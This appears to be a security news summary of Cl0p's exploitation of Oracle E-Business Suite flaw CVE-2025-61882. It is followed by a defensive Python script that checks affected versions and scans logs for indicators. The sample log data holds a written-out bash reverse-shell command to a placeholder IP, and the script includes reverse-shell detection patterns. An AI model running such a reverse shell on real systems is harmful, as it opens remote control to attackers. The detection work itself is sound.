Oracle Confirms Cl0p Ransomware Group Exploited Zero-Day (CVE-2025-61882) to Attack E-Business Suite Customers


389/68 Tuesday, October 7, 2025

Oracle has confirmed that the Cl0p ransomware group was behind a wave of data-theft attacks on Oracle E-Business Suite (EBS) customers that exploited a zero-day vulnerability tracked as CVE-2025-61882. The flaw is rated CVSS 9.8: it is reachable over HTTP without authentication and allows remote code execution. It affects Oracle EBS versions 12.2.3 through 12.2.14, in the BI Publisher Integration component of Oracle Concurrent Processing.

The campaign began in August 2025, when Cl0p exfiltrated data from EBS customers; ransom emails followed in late September. Researchers from Google Threat Intelligence Group (GTIG) and Mandiant found that the ransom emails were sent from compromised accounts previously associated with the FIN11 cybercrime group, and later confirmed that Cl0p was behind them. The attack pattern closely mirrors earlier Cl0p campaigns that abused zero-day flaws in file-transfer products such as MOVEit Transfer, Cleo, and Fortra GoAnywhere MFT.

Oracle has released a security patch for CVE-2025-61882 and published Indicators of Compromise (IoCs) to help customers detect intrusions. Mandiant noted that the attackers also leveraged a second vulnerability that Oracle had patched in July 2025, and warned that other threat actors are likely to adopt the zero-day now that it is public. Mandiant CTO Charles Carmakal advised organizations to verify whether their systems were compromised even if the patches have already been applied, since patching closes the entry point but does not evict an attacker who is already inside. There are also indications that Scattered Spider and ShinyHunters may be involved, following reports that exploit code for the vulnerability was circulated on Telegram.
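As an added illustration of the post-patch triage the paragraph above calls for (this is example code written for this page, not code from Oracle, Mandiant, or the SecurityWeek article), the script below does two things an EBS administrator would do first: check whether a running EBS version falls in the affected range the advisory names, and sweep log lines for published indicators. Every indicator value, log line, and URL path in it is a constructed placeholder: the IP addresses come from RFC 5737 documentation ranges, and the command-line patterns are generic bash reverse-shell signatures chosen here as assumptions, not Oracle's published IoC list. Swap in the real indicators from Oracle's advisory before running it against production logs.

```python
"""Post-patch triage for CVE-2025-61882: version check plus IoC sweep.

Illustrative example only. IOC_IPS, IOC_COMMAND_PATTERNS and SAMPLE_LOGS are
constructed placeholders, not Oracle's published indicators.
"""
import ipaddress
import re
from dataclasses import dataclass

# Affected range as stated in the advisory summary: 12.2.3 through 12.2.14.
AFFECTED_MIN = (12, 2, 3)
AFFECTED_MAX = (12, 2, 14)

# Constructed placeholder indicator IPs (RFC 5737 documentation ranges).
IOC_IPS = {"203.0.113.45", "198.51.100.7"}

# Generic post-exploitation patterns (assumed for this example, not from Oracle):
# a bash /dev/tcp reverse shell and the interactive-bash redirection it uses.
IOC_COMMAND_PATTERNS = [
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    re.compile(r"bash\s+-i\s+>&"),
]

# Constructed sample lines: Apache/OHS-style access log entries and a
# process-audit line, with generic EBS paths (no exploit URLs).
SAMPLE_LOGS = [
    '203.0.113.45 - - [04/Oct/2025:02:13:07 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 1842',
    '10.20.30.40 - - [04/Oct/2025:02:14:11 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 1842',
    'audit: uid=applmgr cmd="sh -c /bin/bash -i >& /dev/tcp/203.0.113.45/4444 0>&1"',
    '192.0.2.99 - - [04/Oct/2025:02:15:00 +0000] "GET /OA_HTML/RF.jsp HTTP/1.1" 404 0',
]

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


@dataclass
class Hit:
    line_no: int   # 1-based index into the scanned input
    reason: str    # "ioc-ip:<addr>" or "pattern:<regex>"
    line: str


def parse_version(text: str) -> tuple:
    """Turn '12.2.10' into (12, 2, 10); raises ValueError on junk."""
    parts = tuple(int(p) for p in text.strip().split("."))
    if len(parts) != 3:
        raise ValueError(f"expected three components, got {text!r}")
    return parts


def affected_by_cve_2025_61882(version: str) -> bool:
    """True when the EBS version is inside the advisory's affected range."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def extract_ips(line: str) -> list:
    """Return only syntactically valid IPv4 addresses found in the line."""
    found = []
    for candidate in IP_RE.findall(line):
        try:
            ipaddress.ip_address(candidate)
            found.append(candidate)
        except ValueError:
            continue  # e.g. 999.1.1.1 looks like an IP but is not one
    return found


def scan(lines, ioc_ips=IOC_IPS, patterns=IOC_COMMAND_PATTERNS) -> list:
    """Flag each line that carries an indicator IP or a suspicious command."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for ip in extract_ips(line):
            if ip in ioc_ips:
                hits.append(Hit(n, f"ioc-ip:{ip}", line))
                break  # one IP hit per line is enough
        for pat in patterns:
            if pat.search(line):
                hits.append(Hit(n, f"pattern:{pat.pattern}", line))
                break
    return hits


if __name__ == "__main__":
    for v in ("12.2.2", "12.2.10", "12.2.14", "12.1.3"):
        print(f"EBS {v}: {'AFFECTED' if affected_by_cve_2025_61882(v) else 'not in range'}")
    for h in scan(SAMPLE_LOGS):
        print(f"line {h.line_no}: {h.reason}\n    {h.line}")
```

The sweep reports a line once per indicator class, so the audit line above produces both an IP hit and a pattern hit, which is what you want when correlating a known C2 address with the command that contacted it. A clean run (no hits) is not proof of absence: it only says the logs you fed in contain none of the indicators you supplied.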

Source https://www.securityweek.com/oracle-e-business-suite-zero-day-exploited-in-cl0p-attacks/